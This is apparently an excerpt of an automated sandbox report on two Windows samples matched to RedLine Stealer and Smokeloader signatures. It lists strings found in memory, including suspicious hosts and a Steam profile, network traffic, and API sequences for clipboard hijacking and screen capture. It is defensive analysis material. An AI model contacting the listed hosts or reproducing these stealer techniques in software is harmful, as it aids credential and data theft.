    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=M_FULq_A
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/applications/community/manifest.js?v=lviE
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/global.js?v=jWc2JLWHx5Kn&l=english&am
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/jquery-1.11.1.min.js?v=gQHVlrK4-jX-&l
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/prototype-1.7.js?v=npJElBnrEO6W&l=eng
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/javascript/scriptaculous/_combined.js?v=pbdAKOcDIgbC
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/buttons.css?v=qhQgyjWi6LgJ&l=english&
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/motiva_sans.css?v=-yZgCk0Nu7kH&l=engl
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_global.css?v=Eq36AUaEgab8&l=en
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/css/shared_responsive.css?v=JL1e4uQSrVGe&
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/header/logo_steam.svg?t=962016
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_logo.png
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/header_menu_hamburger.png
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/images/responsive/logo_valve_footer.png
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/auth_refresh.js?v=w6QbwI-5-j2S&amp
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_global.js?v=Gr6TbGRvDtNE&am
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/shared_responsive_adapter.js?v=tvQ
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://community.fastly.steamstatic.com/public/shared/javascript/tooltip.js?v=QYkT4eS5mbTN&l=en
    Source: 26A5.tmp.exe, 00000003.00000003.1536013159.0000000000615000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789098662.0000000000618000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://crowdwarek.shop/
    Source: 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://help.steampowered.com/en/
    Source: 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://login.steampowered.com/
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://lv.queniujq.cn
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://medal.tv
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://player.vimeo.com
    Source: g3toRYa6JE.exe, 00000000.00000002.3872617941.0000000000710000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/
    Source: g3toRYa6JE.exeString found in binary or memory: https://post-to-me.com/track_prt.php?sub=
    Source: g3toRYa6JE.exe, 00000000.00000002.3872280925.0000000000400000.00000040.00000001.01000000.00000003.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=&cc=DE
    Source: g3toRYa6JE.exe, 00000000.00000002.3872617941.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DE/
    Source: g3toRYa6JE.exe, 00000000.00000002.3872617941.0000000000726000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://post-to-me.com/track_prt.php?sub=0&cc=DEQ
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://recaptcha.net/recaptcha/;
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://s.ytimg.com;
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://sketchfab.com
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steam.tv/
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast-test.akamaized.net
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcast.akamaized.net
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steambroadcastchat.akamaized.net
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/?subsection=broadcasts
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/discussions/
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.org
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/login/home/?goto=profiles%2F76561199724331900
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/market/
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/my/wishlist/
    Source: 26A5.tmp.exe, 00000003.00000002.1789026423.00000000005F8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536013159.0000000000615000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536013159.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789098662.0000000000618000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000617000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/profiles/76561199724331900
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://steamcommunity.com/workshop/
    Source: 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/
    Source: 26A5.tmp.exe, 00000003.00000002.1789098662.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536225130.000000000066C000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;
    Source: 26A5.tmp.exe, 00000003.00000002.1789098662.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbb
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/about/
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/explore/
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536311421.00000000005E8000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789006234.00000000005EB000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536346986.00000000005EA000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/legal/
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/mobile
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/news/
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop/
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/points/shop~
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/privacy_agreement/
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/stats/
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/steam_refunds/
    Source: 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://store.steampowered.com/subscriber_agreement/
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com
    Source: 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.google.com/recaptcha/
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.cn/recaptcha/
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.gstatic.com/recaptcha/
    Source: 26A5.tmp.exe, 00000003.00000003.1535978353.0000000000679000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536293189.0000000000682000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1536013159.00000000005F7000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000003.1535978353.000000000067F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.valvesoftware.com/en/contact?contact-person=Translation%20Team%20Feedback
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com
    Source: 26A5.tmp.exe, 00000003.00000003.1536127869.0000000000634000.00000004.00000020.00020000.00000000.sdmp, 26A5.tmp.exe, 00000003.00000002.1789155725.000000000066C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/
    Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 63355 -> 443
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
    Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 63355
    Source: unknownHTTPS traffic detected: 104.21.56.70:443 -> 192.168.2.9:49707 version: TLS 1.2
    Source: unknownHTTPS traffic detected: 104.102.49.254:443 -> 192.168.2.9:63355 version: TLS 1.2
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00781942 __EH_prolog3_GS,Sleep,OpenClipboard,GetClipboardData,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_00781942
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004016DF __ehhandler$___std_fs_get_file_id@8,__EH_prolog3_GS,Sleep,GlobalLock,OpenClipboard,GetClipboardData,GlobalLock,_strlen,_strlen,_strlen,EmptyClipboard,GlobalAlloc,GlobalLock,GlobalUnlock,SetClipboardData,GlobalFree,CloseClipboard,Sleep,0_2_004016DF
    Source: C:\Users\user\AppData\Local\Temp\26A5.tmp.exeCode function: 3_2_00436980 GetDC,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetCurrentObject,GetObjectW,DeleteObject,CreateCompatibleDC,CreateCompatibleBitmap,SelectObject,BitBlt,SelectObject,DeleteDC,StretchBlt,ReleaseDC,DeleteObject,DeleteObject,3_2_00436980

    System Summary

    barindex
    Source: 00000003.00000002.1788938311.00000000005A3000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000000.00000002.3872584271.0000000000693000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c Author: unknown
    Source: 00000003.00000002.1789367411.0000000002140000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: 00000000.00000002.3872773299.0000000000780000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f Author: unknown
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00782357 NtdllDefWindowProc_W,GetClientRect,GetDC,CreateSolidBrush,CreatePen,Rectangle,GetDeviceCaps,MulDiv,CreateFontW,SetBkMode,_wcslen,_wcslen,_wcslen,_wcslen,ReleaseDC,0_2_00782357
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007825FB NtdllDefWindowProc_W,PostQuitMessage,0_2_007825FB
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004280120_2_00428012
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004071A10_2_004071A1
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004373C90_2_004373C9
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004274740_2_00427474
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0042D4DE0_2_0042D4DE
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004285500_2_00428550
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0043D6680_2_0043D668
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0041669F0_2_0041669F
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004137150_2_00413715
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_004277E60_2_004277E6
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0040E96A0_2_0040E96A
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0042EAD00_2_0042EAD0
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00427A900_2_00427A90
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00418A9F0_2_00418A9F
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00436CAF0_2_00436CAF
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00427D570_2_00427D57
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00413EFB0_2_00413EFB
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007941620_2_00794162
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007AED370_2_007AED37
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007A82790_2_007A8279
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007A76DB0_2_007A76DB
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007AD7450_2_007AD745
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007A87B70_2_007A87B7
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0079397C0_2_0079397C
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007969060_2_00796906
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007A7A4D0_2_007A7A4D
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_0078EBD10_2_0078EBD1
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007A7CF70_2_007A7CF7
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007AED370_2_007AED37
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_00798D060_2_00798D06
    Source: C:\Users\user\Desktop\g3toRYa6JE.exeCode function: 0_2_007B6F160_2_007B6F16
